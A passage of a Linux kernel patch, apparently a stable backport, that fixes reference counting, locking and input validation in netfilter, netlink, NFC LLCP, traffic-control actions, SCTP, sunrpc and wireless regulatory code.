+ 
+ 		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
+ 		    chain->table == table &&
+-		    id == nft_trans_chain_id(trans))
++		    id == nft_trans_chain_id(trans) &&
++		    nft_active_genmask(chain, genmask))
+ 			return chain;
+ 	}
+ 	return ERR_PTR(-ENOENT);
+@@ -3629,7 +3630,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+-		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
++		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
++					      genmask);
+ 		if (IS_ERR(chain)) {
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
+ 			return PTR_ERR(chain);
+@@ -5139,6 +5141,8 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		nft_set_trans_unbind(ctx, set);
+ 		if (nft_set_is_anonymous(set))
+ 			nft_deactivate_next(ctx->net, set);
++		else
++			list_del_rcu(&binding->list);
+ 
+ 		set->use--;
+ 		break;
+@@ -10135,7 +10139,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 						 genmask);
+ 		} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
+ 			chain = nft_chain_lookup_byid(ctx->net, ctx->table,
+-						      tb[NFTA_VERDICT_CHAIN_ID]);
++						      tb[NFTA_VERDICT_CHAIN_ID],
++						      genmask);
+ 			if (IS_ERR(chain))
+ 				return PTR_ERR(chain);
+ 		} else {
+diff --git a/net/netfilter/nft_byteorder.c b/net/netfilter/nft_byteorder.c
+index f952a80275a81..2e2eb2cb17bc7 100644
+--- a/net/netfilter/nft_byteorder.c
++++ b/net/netfilter/nft_byteorder.c
+@@ -30,11 +30,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 	const struct nft_byteorder *priv = nft_expr_priv(expr);
+ 	u32 *src = &regs->data[priv->sreg];
+ 	u32 *dst = &regs->data[priv->dreg];
+-	union { u32 u32; u16 u16; } *s, *d;
++	u16 *s16, *d16;
+ 	unsigned int i;
+ 
+-	s = (void *)src;
+-	d = (void *)dst;
++	s16 = (void *)src;
++	d16 = (void *)dst;
+ 
+ 	switch (priv->size) {
+ 	case 8: {
+@@ -62,11 +62,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 4; i++)
+-				d[i].u32 = ntohl((__force __be32)s[i].u32);
++				dst[i] = ntohl((__force __be32)src[i]);
+ 			break;
+ 		case NFT_BYTEORDER_HTON:
+ 			for (i = 0; i < priv->len / 4; i++)
+-				d[i].u32 = (__force __u32)htonl(s[i].u32);
++				dst[i] = (__force __u32)htonl(src[i]);
+ 			break;
+ 		}
+ 		break;
+@@ -74,11 +74,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 2; i++)
+-				d[i].u16 = ntohs((__force __be16)s[i].u16);
++				d16[i] = ntohs((__force __be16)s16[i]);
+ 			break;
+ 		case NFT_BYTEORDER_HTON:
+ 			for (i = 0; i < priv->len / 2; i++)
+-				d[i].u16 = (__force __u16)htons(s[i].u16);
++				d16[i] = (__force __u16)htons(s16[i]);
+ 			break;
+ 		}
+ 		break;
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 6d493a0ccf399..ed123cf462afe 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1589,6 +1589,7 @@ out:
+ int netlink_set_err(struct sock *ssk, u32 portid, u32 group, int code)
+ {
+ 	struct netlink_set_err_data info;
++	unsigned long flags;
+ 	struct sock *sk;
+ 	int ret = 0;
+ 
+@@ -1598,12 +1599,12 @@ int netlink_set_err(struct sock *ssk, u32 portid, u32 group, int code)
+ 	/* sk->sk_err wants a positive error value */
+ 	info.code = -code;
+ 
+-	read_lock(&nl_table_lock);
++	read_lock_irqsave(&nl_table_lock, flags);
+ 
+ 	sk_for_each_bound(sk, &nl_table[ssk->sk_protocol].mc_list)
+ 		ret += do_one_set_err(sk, &info);
+ 
+-	read_unlock(&nl_table_lock);
++	read_unlock_irqrestore(&nl_table_lock, flags);
+ 	return ret;
+ }
+ EXPORT_SYMBOL(netlink_set_err);
+diff --git a/net/netlink/diag.c b/net/netlink/diag.c
+index c6255eac305c7..e4f21b1067bcc 100644
+--- a/net/netlink/diag.c
++++ b/net/netlink/diag.c
+@@ -94,6 +94,7 @@ static int __netlink_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct net *net = sock_net(skb->sk);
+ 	struct netlink_diag_req *req;
+ 	struct netlink_sock *nlsk;
++	unsigned long flags;
+ 	struct sock *sk;
+ 	int num = 2;
+ 	int ret = 0;
+@@ -152,7 +153,7 @@ static int __netlink_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	num++;
+ 
+ mc_list:
+-	read_lock(&nl_table_lock);
++	read_lock_irqsave(&nl_table_lock, flags);
+ 	sk_for_each_bound(sk, &tbl->mc_list) {
+ 		if (sk_hashed(sk))
+ 			continue;
+@@ -167,13 +168,13 @@ mc_list:
+ 				 NETLINK_CB(cb->skb).portid,
+ 				 cb->nlh->nlmsg_seq,
+ 				 NLM_F_MULTI,
+-				 sock_i_ino(sk)) < 0) {
++				 __sock_i_ino(sk)) < 0) {
+ 			ret = 1;
+ 			break;
+ 		}
+ 		num++;
+ 	}
+-	read_unlock(&nl_table_lock);
++	read_unlock_irqrestore(&nl_table_lock, flags);
+ 
+ done:
+ 	cb->args[0] = num;
+diff --git a/net/nfc/llcp.h b/net/nfc/llcp.h
+index c1d9be636933c..d8345ed57c954 100644
+--- a/net/nfc/llcp.h
++++ b/net/nfc/llcp.h
+@@ -201,7 +201,6 @@ void nfc_llcp_sock_link(struct llcp_sock_list *l, struct sock *s);
+ void nfc_llcp_sock_unlink(struct llcp_sock_list *l, struct sock *s);
+ void nfc_llcp_socket_remote_param_init(struct nfc_llcp_sock *sock);
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev);
+-struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local);
+ int nfc_llcp_local_put(struct nfc_llcp_local *local);
+ u8 nfc_llcp_get_sdp_ssap(struct nfc_llcp_local *local,
+ 			 struct nfc_llcp_sock *sock);
+diff --git a/net/nfc/llcp_commands.c b/net/nfc/llcp_commands.c
+index 41e3a20c89355..e2680a3bef799 100644
+--- a/net/nfc/llcp_commands.c
++++ b/net/nfc/llcp_commands.c
+@@ -359,6 +359,7 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 	struct sk_buff *skb;
+ 	struct nfc_llcp_local *local;
+ 	u16 size = 0;
++	int err;
+ 
+ 	local = nfc_llcp_find_local(dev);
+ 	if (local == NULL)
+@@ -368,8 +369,10 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 	size += dev->tx_headroom + dev->tx_tailroom + NFC_HEADER_SIZE;
+ 
+ 	skb = alloc_skb(size, GFP_KERNEL);
+-	if (skb == NULL)
+-		return -ENOMEM;
++	if (skb == NULL) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	skb_reserve(skb, dev->tx_headroom + NFC_HEADER_SIZE);
+ 
+@@ -379,8 +382,11 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 
+ 	nfc_llcp_send_to_raw_sock(local, skb, NFC_DIRECTION_TX);
+ 
+-	return nfc_data_exchange(dev, local->target_idx, skb,
++	err = nfc_data_exchange(dev, local->target_idx, skb,
+ 				 nfc_llcp_recv, local);
++out:
++	nfc_llcp_local_put(local);
++	return err;
+ }
+ 
+ int nfc_llcp_send_connect(struct nfc_llcp_sock *sock)
+@@ -390,7 +396,8 @@ int nfc_llcp_send_connect(struct nfc_llcp_sock *sock)
+ 	const u8 *service_name_tlv = NULL;
+ 	const u8 *miux_tlv = NULL;
+ 	const u8 *rw_tlv = NULL;
+-	u8 service_name_tlv_length, miux_tlv_length,  rw_tlv_length, rw;
++	u8 service_name_tlv_length = 0;
++	u8 miux_tlv_length,  rw_tlv_length, rw;
+ 	int err;
+ 	u16 size = 0;
+ 	__be16 miux;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index a27e1842b2a09..f60e424e06076 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -17,6 +17,8 @@
+ static u8 llcp_magic[3] = {0x46, 0x66, 0x6d};
+ 
+ static LIST_HEAD(llcp_devices);
++/* Protects llcp_devices list */
++static DEFINE_SPINLOCK(llcp_devices_lock);
+ 
+ static void nfc_llcp_rx_skb(struct nfc_llcp_local *local, struct sk_buff *skb);
+ 
+@@ -141,7 +143,7 @@ static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
+ 	write_unlock(&local->raw_sockets.lock);
+ }
+ 
+-struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
++static struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
+ {
+ 	kref_get(&local->ref);
+ 
+@@ -169,7 +171,6 @@ static void local_release(struct kref *ref)
+ 
+ 	local = container_of(ref, struct nfc_llcp_local, ref);
+ 
+-	list_del(&local->list);
+ 	local_cleanup(local);
+ 	kfree(local);
+ }
+@@ -282,12 +283,33 @@ static void nfc_llcp_sdreq_timer(struct timer_list *t)
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev)
+ {
+ 	struct nfc_llcp_local *local;
++	struct nfc_llcp_local *res = NULL;
+ 
++	spin_lock(&llcp_devices_lock);
+ 	list_for_each_entry(local, &llcp_devices, list)
+-		if (local->dev == dev)
++		if (local->dev == dev) {
++			res = nfc_llcp_local_get(local);
++			break;
++		}
++	spin_unlock(&llcp_devices_lock);
++
++	return res;
++}
++
++static struct nfc_llcp_local *nfc_llcp_remove_local(struct nfc_dev *dev)
++{
++	struct nfc_llcp_local *local, *tmp;
++
++	spin_lock(&llcp_devices_lock);
++	list_for_each_entry_safe(local, tmp, &llcp_devices, list)
++		if (local->dev == dev) {
++			list_del(&local->list);
++			spin_unlock(&llcp_devices_lock);
+ 			return local;
++		}
++	spin_unlock(&llcp_devices_lock);
+ 
+-	pr_debug("No device found\n");
++	pr_warn("Shutting down device not found\n");
+ 
+ 	return NULL;
+ }
+@@ -608,12 +630,15 @@ u8 *nfc_llcp_general_bytes(struct nfc_dev *dev, size_t *general_bytes_len)
+ 
+ 	*general_bytes_len = local->gb_len;
+ 
++	nfc_llcp_local_put(local);
++
+ 	return local->gb;
+ }
+ 
+ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len)
+ {
+ 	struct nfc_llcp_local *local;
++	int err;
+ 
+ 	if (gb_len < 3 || gb_len > NFC_MAX_GT_LEN)
+ 		return -EINVAL;
+@@ -630,12 +655,16 @@ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len)
+ 
+ 	if (memcmp(local->remote_gb, llcp_magic, 3)) {
+ 		pr_err("MAC does not support LLCP\n");
+-		return -EINVAL;
++		err = -EINVAL;
++		goto out;
+ 	}
+ 
+-	return nfc_llcp_parse_gb_tlv(local,
++	err = nfc_llcp_parse_gb_tlv(local,
+ 				     &local->remote_gb[3],
+ 				     local->remote_gb_len - 3);
++out:
++	nfc_llcp_local_put(local);
++	return err;
+ }
+ 
+ static u8 nfc_llcp_dsap(const struct sk_buff *pdu)
+@@ -1517,6 +1546,8 @@ int nfc_llcp_data_received(struct nfc_dev *dev, struct sk_buff *skb)
+ 
+ 	__nfc_llcp_recv(local, skb);
+ 
++	nfc_llcp_local_put(local);
++
+ 	return 0;
+ }
+ 
+@@ -1533,6 +1564,8 @@ void nfc_llcp_mac_is_down(struct nfc_dev *dev)
+ 
+ 	/* Close and purge all existing sockets */
+ 	nfc_llcp_socket_release(local, true, 0);
++
++	nfc_llcp_local_put(local);
+ }
+ 
+ void nfc_llcp_mac_is_up(struct nfc_dev *dev, u32 target_idx,
+@@ -1558,6 +1591,8 @@ void nfc_llcp_mac_is_up(struct nfc_dev *dev, u32 target_idx,
+ 		mod_timer(&local->link_timer,
+ 			  jiffies + msecs_to_jiffies(local->remote_lto));
+ 	}
++
++	nfc_llcp_local_put(local);
+ }
+ 
+ int nfc_llcp_register_device(struct nfc_dev *ndev)
+@@ -1608,7 +1643,7 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 
+ void nfc_llcp_unregister_device(struct nfc_dev *dev)
+ {
+-	struct nfc_llcp_local *local = nfc_llcp_find_local(dev);
++	struct nfc_llcp_local *local = nfc_llcp_remove_local(dev);
+ 
+ 	if (local == NULL) {
+ 		pr_debug("No such device\n");
+diff --git a/net/nfc/llcp_sock.c b/net/nfc/llcp_sock.c
+index 77642d18a3b43..645677f84dba2 100644
+--- a/net/nfc/llcp_sock.c
++++ b/net/nfc/llcp_sock.c
+@@ -99,7 +99,7 @@ static int llcp_sock_bind(struct socket *sock, struct sockaddr *addr, int alen)
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->nfc_protocol = llcp_addr.nfc_protocol;
+ 	llcp_sock->service_name_len = min_t(unsigned int,
+ 					    llcp_addr.service_name_len,
+@@ -186,7 +186,7 @@ static int llcp_raw_sock_bind(struct socket *sock, struct sockaddr *addr,
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->nfc_protocol = llcp_addr.nfc_protocol;
+ 
+ 	nfc_llcp_sock_link(&local->raw_sockets, sk);
+@@ -696,22 +696,22 @@ static int llcp_sock_connect(struct socket *sock, struct sockaddr *_addr,
+ 	if (dev->dep_link_up == false) {
+ 		ret = -ENOLINK;
+ 		device_unlock(&dev->dev);
+-		goto put_dev;
++		goto sock_llcp_put_local;
+ 	}
+ 	device_unlock(&dev->dev);
+ 
+ 	if (local->rf_mode == NFC_RF_INITIATOR &&
+ 	    addr->target_idx != local->target_idx) {
+ 		ret = -ENOLINK;
+-		goto put_dev;
++		goto sock_llcp_put_local;
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->ssap = nfc_llcp_get_local_ssap(local);
+ 	if (llcp_sock->ssap == LLCP_SAP_MAX) {
+ 		ret = -ENOMEM;
+-		goto sock_llcp_put_local;
++		goto sock_llcp_nullify;
+ 	}
+ 
+ 	llcp_sock->reserved_ssap = llcp_sock->ssap;
+@@ -757,11 +757,13 @@ sock_unlink:
+ sock_llcp_release:
+ 	nfc_llcp_put_ssap(local, llcp_sock->ssap);
+ 
+-sock_llcp_put_local:
+-	nfc_llcp_local_put(llcp_sock->local);
++sock_llcp_nullify:
+ 	llcp_sock->local = NULL;
+ 	llcp_sock->dev = NULL;
+ 
++sock_llcp_put_local:
++	nfc_llcp_local_put(local);
++
+ put_dev:
+ 	nfc_put_device(dev);
+ 
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index b9264e730fd93..e9ac6a6f934e7 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1039,11 +1039,14 @@ static int nfc_genl_llc_get_params(struct sk_buff *skb, struct genl_info *info)
+ 	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+ 	if (!msg) {
+ 		rc = -ENOMEM;
+-		goto exit;
++		goto put_local;
+ 	}
+ 
+ 	rc = nfc_genl_send_params(msg, local, info->snd_portid, info->snd_seq);
+ 
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+@@ -1105,7 +1108,7 @@ static int nfc_genl_llc_set_params(struct sk_buff *skb, struct genl_info *info)
+ 	if (info->attrs[NFC_ATTR_LLC_PARAM_LTO]) {
+ 		if (dev->dep_link_up) {
+ 			rc = -EINPROGRESS;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		local->lto = nla_get_u8(info->attrs[NFC_ATTR_LLC_PARAM_LTO]);
+@@ -1117,6 +1120,9 @@ static int nfc_genl_llc_set_params(struct sk_buff *skb, struct genl_info *info)
+ 	if (info->attrs[NFC_ATTR_LLC_PARAM_MIUX])
+ 		local->miux = cpu_to_be16(miux);
+ 
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+@@ -1172,7 +1178,7 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		if (rc != 0) {
+ 			rc = -EINVAL;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		if (!sdp_attrs[NFC_SDP_ATTR_URI])
+@@ -1191,7 +1197,7 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 		sdreq = nfc_llcp_build_sdreq_tlv(tid, uri, uri_len);
+ 		if (sdreq == NULL) {
+ 			rc = -ENOMEM;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		tlvs_len += sdreq->tlv_len;
+@@ -1201,10 +1207,14 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (hlist_empty(&sdreq_list)) {
+ 		rc = -EINVAL;
+-		goto exit;
++		goto put_local;
+ 	}
+ 
+ 	rc = nfc_llcp_send_snl_sdreq(local, &sdreq_list, tlvs_len);
++
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+diff --git a/net/nfc/nfc.h b/net/nfc/nfc.h
+index de2ec66d7e83a..0b1e6466f4fbf 100644
+--- a/net/nfc/nfc.h
++++ b/net/nfc/nfc.h
+@@ -52,6 +52,7 @@ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len);
+ u8 *nfc_llcp_general_bytes(struct nfc_dev *dev, size_t *general_bytes_len);
+ int nfc_llcp_data_received(struct nfc_dev *dev, struct sk_buff *skb);
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev);
++int nfc_llcp_local_put(struct nfc_llcp_local *local);
+ int __init nfc_llcp_init(void);
+ void nfc_llcp_exit(void);
+ void nfc_llcp_free_sdp_tlv(struct nfc_llcp_sdp_tlv *sdp);
+diff --git a/net/sched/act_ipt.c b/net/sched/act_ipt.c
+index 1625e10374161..29974de689ec9 100644
+--- a/net/sched/act_ipt.c
++++ b/net/sched/act_ipt.c
+@@ -47,7 +47,7 @@ static int ipt_init_target(struct net *net, struct xt_entry_target *t,
+ 	par.entryinfo = &e;
+ 	par.target    = target;
+ 	par.targinfo  = t->data;
+-	par.hook_mask = hook;
++	par.hook_mask = 1 << hook;
+ 	par.family    = NFPROTO_IPV4;
+ 
+ 	ret = xt_check_target(&par, t->u.target_size - sizeof(*t), 0, false);
+@@ -84,7 +84,8 @@ static void tcf_ipt_release(struct tc_action *a)
+ 
+ static const struct nla_policy ipt_policy[TCA_IPT_MAX + 1] = {
+ 	[TCA_IPT_TABLE]	= { .type = NLA_STRING, .len = IFNAMSIZ },
+-	[TCA_IPT_HOOK]	= { .type = NLA_U32 },
++	[TCA_IPT_HOOK]	= NLA_POLICY_RANGE(NLA_U32, NF_INET_PRE_ROUTING,
++					   NF_INET_NUMHOOKS),
+ 	[TCA_IPT_INDEX]	= { .type = NLA_U32 },
+ 	[TCA_IPT_TARG]	= { .len = sizeof(struct xt_entry_target) },
+ };
+@@ -157,15 +158,27 @@ static int __tcf_ipt_init(struct net *net, unsigned int id, struct nlattr *nla,
+ 			return -EEXIST;
+ 		}
+ 	}
++
++	err = -EINVAL;
+ 	hook = nla_get_u32(tb[TCA_IPT_HOOK]);
++	switch (hook) {
++	case NF_INET_PRE_ROUTING:
++		break;
++	case NF_INET_POST_ROUTING:
++		break;
++	default:
++		goto err1;
++	}
+ 
+-	err = -ENOMEM;
+-	tname = kmalloc(IFNAMSIZ, GFP_KERNEL);
++	if (tb[TCA_IPT_TABLE]) {
++		/* mangle only for now */
++		if (nla_strcmp(tb[TCA_IPT_TABLE], "mangle"))
++			goto err1;
++	}
++
++	tname = kstrdup("mangle", GFP_KERNEL);
+ 	if (unlikely(!tname))
+ 		goto err1;
+-	if (tb[TCA_IPT_TABLE] == NULL ||
+-	    nla_strscpy(tname, tb[TCA_IPT_TABLE], IFNAMSIZ) >= IFNAMSIZ)
+-		strcpy(tname, "mangle");
+ 
+ 	t = kmemdup(td, td->u.target_size, GFP_KERNEL);
+ 	if (unlikely(!t))
+@@ -216,6 +229,26 @@ static int tcf_xt_init(struct net *net, struct nlattr *nla,
+ 			      a, &act_xt_ops, tp, flags);
+ }
+ 
++static bool tcf_ipt_act_check(struct sk_buff *skb)
++{
++	const struct iphdr *iph;
++	unsigned int nhoff, len;
++
++	if (!pskb_may_pull(skb, sizeof(struct iphdr)))
++		return false;
++
++	nhoff = skb_network_offset(skb);
++	iph = ip_hdr(skb);
++	if (iph->ihl < 5 || iph->version != 4)
++		return false;
++
++	len = skb_ip_totlen(skb);
++	if (skb->len < nhoff + len || len < (iph->ihl * 4u))
++		return false;
++
++	return pskb_may_pull(skb, iph->ihl * 4u);
++}
++
+ static int tcf_ipt_act(struct sk_buff *skb, const struct tc_action *a,
+ 		       struct tcf_result *res)
+ {
+@@ -229,9 +262,22 @@ static int tcf_ipt_act(struct sk_buff *skb, const struct tc_action *a,
+ 		.pf	= NFPROTO_IPV4,
+ 	};
+ 
++	if (skb_protocol(skb, false) != htons(ETH_P_IP))
++		return TC_ACT_UNSPEC;
++
+ 	if (skb_unclone(skb, GFP_ATOMIC))
+ 		return TC_ACT_UNSPEC;
+ 
++	if (!tcf_ipt_act_check(skb))
++		return TC_ACT_UNSPEC;
++
++	if (state.hook == NF_INET_POST_ROUTING) {
++		if (!skb_dst(skb))
++			return TC_ACT_UNSPEC;
++
++		state.out = skb->dev;
++	}
++
+ 	spin_lock(&ipt->tcf_lock);
+ 
+ 	tcf_lastuse_update(&ipt->tcf_tm);
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 180669aa9d097..aee2e13f1db62 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -28,6 +28,7 @@ static struct tc_action_ops act_pedit_ops;
+ 
+ static const struct nla_policy pedit_policy[TCA_PEDIT_MAX + 1] = {
+ 	[TCA_PEDIT_PARMS]	= { .len = sizeof(struct tc_pedit) },
++	[TCA_PEDIT_PARMS_EX]	= { .len = sizeof(struct tc_pedit) },
+ 	[TCA_PEDIT_KEYS_EX]   = { .type = NLA_NESTED },
+ };
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index bc3d08bd7cef3..c806d272107ac 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -363,9 +363,9 @@ static void sctp_auto_asconf_init(struct sctp_sock *sp)
+ 	struct net *net = sock_net(&sp->inet.sk);
+ 
+ 	if (net->sctp.default_auto_asconf) {
+-		spin_lock(&net->sctp.addr_wq_lock);
++		spin_lock_bh(&net->sctp.addr_wq_lock);
+ 		list_add_tail(&sp->auto_asconf_list, &net->sctp.auto_asconf_splist);
+-		spin_unlock(&net->sctp.addr_wq_lock);
++		spin_unlock_bh(&net->sctp.addr_wq_lock);
+ 		sp->do_auto_asconf = 1;
+ 	}
+ }
+@@ -8279,6 +8279,22 @@ static int sctp_getsockopt(struct sock *sk, int level, int optname,
+ 	return retval;
+ }
+ 
++static bool sctp_bpf_bypass_getsockopt(int level, int optname)
++{
++	if (level == SOL_SCTP) {
++		switch (optname) {
++		case SCTP_SOCKOPT_PEELOFF:
++		case SCTP_SOCKOPT_PEELOFF_FLAGS:
++		case SCTP_SOCKOPT_CONNECTX3:
++			return true;
++		default:
++			return false;
++		}
++	}
++
++	return false;
++}
++
+ static int sctp_hash(struct sock *sk)
+ {
+ 	/* STUB */
+@@ -9643,6 +9659,7 @@ struct proto sctp_prot = {
+ 	.shutdown    =	sctp_shutdown,
+ 	.setsockopt  =	sctp_setsockopt,
+ 	.getsockopt  =	sctp_getsockopt,
++	.bpf_bypass_getsockopt	= sctp_bpf_bypass_getsockopt,
+ 	.sendmsg     =	sctp_sendmsg,
+ 	.recvmsg     =	sctp_recvmsg,
+ 	.bind        =	sctp_bind,
+@@ -9698,6 +9715,7 @@ struct proto sctpv6_prot = {
+ 	.shutdown	= sctp_shutdown,
+ 	.setsockopt	= sctp_setsockopt,
+ 	.getsockopt	= sctp_getsockopt,
++	.bpf_bypass_getsockopt	= sctp_bpf_bypass_getsockopt,
+ 	.sendmsg	= sctp_sendmsg,
+ 	.recvmsg	= sctp_recvmsg,
+ 	.bind		= sctp_bind,
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index d808c00cdbac1..23b4c728de598 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -688,12 +688,6 @@ static void svc_tcp_listen_data_ready(struct sock *sk)
+ {
+ 	struct svc_sock	*svsk = (struct svc_sock *)sk->sk_user_data;
+ 
+-	if (svsk) {
+-		/* Refer to svc_setup_socket() for details. */
+-		rmb();
+-		svsk->sk_odata(sk);
+-	}
+-
+ 	/*
+ 	 * This callback may called twice when a new connection
+ 	 * is established as a child socket inherits everything
+@@ -702,13 +696,18 @@ static void svc_tcp_listen_data_ready(struct sock *sk)
+ 	 *    when one of child sockets become ESTABLISHED.
+ 	 * 2) data_ready method of the child socket may be called
+ 	 *    when it receives data before the socket is accepted.
+-	 * In case of 2, we should ignore it silently.
++	 * In case of 2, we should ignore it silently and DO NOT
++	 * dereference svsk.
+ 	 */
+-	if (sk->sk_state == TCP_LISTEN) {
+-		if (svsk) {
+-			set_bit(XPT_CONN, &svsk->sk_xprt.xpt_flags);
+-			svc_xprt_enqueue(&svsk->sk_xprt);
+-		}
++	if (sk->sk_state != TCP_LISTEN)
++		return;
++
++	if (svsk) {
++		/* Refer to svc_setup_socket() for details. */
++		rmb();
++		svsk->sk_odata(sk);
++		set_bit(XPT_CONN, &svsk->sk_xprt.xpt_flags);
++		svc_xprt_enqueue(&svsk->sk_xprt);
+ 	}
+ }
+ 
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 53a7cb2f6c07d..6da6608985ce9 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -796,6 +796,12 @@ int svc_rdma_recvfrom(struct svc_rqst *rqstp)
+ 	struct svc_rdma_recv_ctxt *ctxt;
+ 	int ret;
+ 
++	/* Prevent svc_xprt_release() from releasing pages in rq_pages
++	 * when returning 0 or an error.
++	 */
++	rqstp->rq_respages = rqstp->rq_pages;
++	rqstp->rq_next_page = rqstp->rq_respages;
++
+ 	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	ctxt = NULL;
+@@ -819,12 +825,6 @@ int svc_rdma_recvfrom(struct svc_rqst *rqstp)
+ 				   DMA_FROM_DEVICE);
+ 	svc_rdma_build_arg_xdr(rqstp, ctxt);
+ 
+-	/* Prevent svc_xprt_release from releasing pages in rq_pages
+-	 * if we return 0 or an error.
+-	 */
+-	rqstp->rq_respages = rqstp->rq_pages;
+-	rqstp->rq_next_page = rqstp->rq_respages;
+-
+ 	ret = svc_rdma_xdr_decode_req(&rqstp->rq_arg, ctxt);
+ 	if (ret < 0)
+ 		goto out_err;
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index b3ec9eaec36b3..609b79fe4a748 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -721,22 +721,6 @@ int wiphy_register(struct wiphy *wiphy)
+ 			return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * if a wiphy has unsupported modes for regulatory channel enforcement,
+-	 * opt-out of enforcement checking
+-	 */
+-	if (wiphy->interface_modes & ~(BIT(NL80211_IFTYPE_STATION) |
+-				       BIT(NL80211_IFTYPE_P2P_CLIENT) |
+-				       BIT(NL80211_IFTYPE_AP) |
+-				       BIT(NL80211_IFTYPE_MESH_POINT) |
+-				       BIT(NL80211_IFTYPE_P2P_GO) |
+-				       BIT(NL80211_IFTYPE_ADHOC) |
+-				       BIT(NL80211_IFTYPE_P2P_DEVICE) |
+-				       BIT(NL80211_IFTYPE_NAN) |
+-				       BIT(NL80211_IFTYPE_AP_VLAN) |
+-				       BIT(NL80211_IFTYPE_MONITOR)))
+-		wiphy->regulatory_flags |= REGULATORY_IGNORE_STALE_KICKOFF;
+-
+ 	if (WARN_ON((wiphy->regulatory_flags & REGULATORY_WIPHY_SELF_MANAGED) &&
+ 		    (wiphy->regulatory_flags &
+ 					(REGULATORY_CUSTOM_REG |
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index 522180919a1a3..5da1a641ef178 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -2390,7 +2390,7 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 
+ 		if (!wdev->valid_links && link > 0)
+ 			break;
+-		if (!(wdev->valid_links & BIT(link)))
++		if (wdev->valid_links && !(wdev->valid_links & BIT(link)))
+ 			continue;
+ 		switch (iftype) {
